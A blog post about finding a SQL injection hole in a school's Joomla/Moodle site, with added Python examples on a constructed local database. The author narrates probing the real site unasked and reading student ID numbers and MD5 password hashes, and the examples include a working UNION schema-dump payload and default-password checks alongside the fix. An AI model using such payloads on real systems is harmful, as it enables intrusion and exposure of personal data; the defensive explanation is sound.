Monday, September 1, 2008

So.

Found a SQL injection vulnerability in my former secondary school's website (that's high school for you Americans out there).

Crafted a query to get one column name, table name and schema from the entire database using information_schema.columns.
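The post does not show the query or say where the injection point was, so here is an added, stand-alone illustration (not the author's code and not anything from the school's site) of what that step looks like. The injection point (a course-id parameter concatenated into SQL), the table layout other than mdl_user, and the sample rows are all assumptions. It uses SQLite so it runs offline; SQLite has no information_schema, so the catalog join on sqlite_master and pragma_table_info() stands in for the MySQL query, which is given in a comment.

```python
import sqlite3

# Constructed sample schema standing in for the Joomla + Moodle database in the
# post. Table and column names other than mdl_user(username, password) are
# assumptions; the row contents are made up.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mdl_course (id INTEGER PRIMARY KEY, fullname TEXT)")
    conn.execute("CREATE TABLE mdl_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO mdl_course VALUES (1, 'Chemistry'), (2, 'History')")
    conn.execute("INSERT INTO mdl_user VALUES (1, 'student01', 'x'), (2, 'student02', 'y')")
    return conn

def course_lookup_vulnerable(conn, course_id):
    # The bug (assumed injection point): a request parameter is pasted into the
    # SQL text, so anything after the number becomes part of the statement.
    sql = "SELECT fullname FROM mdl_course WHERE id = " + course_id
    return [row[0] for row in conn.execute(sql)]

def course_lookup_safe(conn, course_id):
    # The fix: validate the type and pass the value as a bound parameter.
    sql = "SELECT fullname FROM mdl_course WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(course_id),))]

# Payload in the spirit of the post: a UNION that pulls every "table.column"
# pair out of the catalog in one response. sqlite_master joined to
# pragma_table_info() is the SQLite equivalent of information_schema.columns.
# On MySQL the same idea reads:
#   0 UNION SELECT CONCAT(table_schema,'.',table_name,'.',column_name)
#           FROM information_schema.columns
SCHEMA_DUMP_PAYLOAD = (
    "0 UNION SELECT m.name || '.' || p.name "
    "FROM sqlite_master AS m, pragma_table_info(m.name) AS p "
    "WHERE m.type = 'table'"
)

def dump_schema_via_injection(conn):
    # Every table.column in the database comes back through the course lookup.
    return sorted(course_lookup_vulnerable(conn, SCHEMA_DUMP_PAYLOAD))

def safe_lookup_rejects_payload(conn):
    # With int() validation plus a bound parameter the payload never reaches SQL.
    try:
        course_lookup_safe(conn, SCHEMA_DUMP_PAYLOAD)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = build_db()
    for entry in dump_schema_via_injection(db):
        print(entry)
    print("safe lookup rejected payload:", safe_lookup_rejects_payload(db))
```

The UNION works because the injected SELECT returns the same number of columns as the original query (one); against a real target the attacker first finds that column count, then reads the catalog exactly as above.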

Came across an mdl_user table (the school was using Joomla, with a Moodle module). Chock full of users: the entire school uses the Moodle module for e-learning, so every single student was in there.

Simple guessing turned up the username and password columns. (NB: no prefixes ;)

Checked that out (remember, SQL injection hole) and the usernames were IC numbers. (The American counterpart would be Social Security Numbers.)

So, they were storing sensitive data, IN CLEARTEXT, as usernames. If I were an identity thief I would have been in Nirvana. Well, close, in any case, though I can't imagine why you would need to impersonate a high schooler.

Anyway, the password was MD5 hashed (Moodle module, remember; if it had been developed in-house it probably would have been in cleartext as well, going by what I've seen so far), but I found that many users had the same password.

So, I dug further into the website. Went to the Moodle main page. And lo and behold, on the login page: "All student accounts have been reset on January 15th with the password 'password'".

Do they seriously expect 15-year-olds to bother about changing their default passwords in a school e-learning portal? At least generate random passwords or something.
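The two observations above (many rows sharing one hash, and a published default of "password") are exactly what an administrator can check for themselves before an outsider does. The following is an added example, not the author's code or anything from Moodle: it builds a constructed mdl_user dump with placeholder usernames (no real IC numbers) and unsalted MD5 hashes as the post describes, then groups on the hash column and tests each cluster against candidate passwords.

```python
import hashlib
import sqlite3

# Constructed sample dump. Usernames are placeholders and the passwords are
# made up; the hashes are computed locally with unsalted MD5, matching what
# the post describes.
SAMPLE_USERS = [
    ("student01", "password"),
    ("student02", "password"),
    ("student03", "password"),
    ("student04", "chem1stry!"),
    ("student05", "Hist0ry"),
    ("student06", "Hist0ry"),
]

def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()

def load_dump(users=SAMPLE_USERS):
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mdl_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO mdl_user (username, password) VALUES (?, ?)",
                     [(u, md5_hex(p)) for u, p in users])
    return conn

def shared_hashes(conn, min_count=2):
    # With unsalted MD5 the same password always yields the same hash, so a
    # GROUP BY on the hash column exposes every cluster of identical passwords
    # without cracking anything. Returns (hash, count) pairs, largest first.
    sql = ("SELECT password, COUNT(*) AS n FROM mdl_user "
           "GROUP BY password HAVING COUNT(*) >= ? ORDER BY n DESC, password")
    return [(h, n) for h, n in conn.execute(sql, (min_count,))]

def accounts_using(conn, candidate_passwords):
    # Test the announced default (and any other guesses) directly: one hash
    # computation and one equality lookup per candidate, again because the
    # hashes are unsalted. Returns {password: [usernames]} for hits only.
    found = {}
    for pw in candidate_passwords:
        rows = conn.execute(
            "SELECT username FROM mdl_user WHERE password = ? ORDER BY username",
            (md5_hex(pw),)).fetchall()
        if rows:
            found[pw] = [r[0] for r in rows]
    return found

if __name__ == "__main__":
    db = load_dump()
    for h, n in shared_hashes(db):
        print(f"{n} accounts share hash {h}")
    for pw, users in accounts_using(db, ["password", "123456"]).items():
        print(f"{len(users)} accounts still use {pw!r}: {', '.join(users)}")
```

Against a real Moodle database the same two queries run unchanged on the mdl_user table; a salted or slow hash (bcrypt) would defeat both the GROUP BY clustering and the single-lookup default check, which is one more reason not to store unsalted MD5.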

So, fired an email to the school's sysadmin, and about five days later, no reply. Hole's still there.

Oh well.
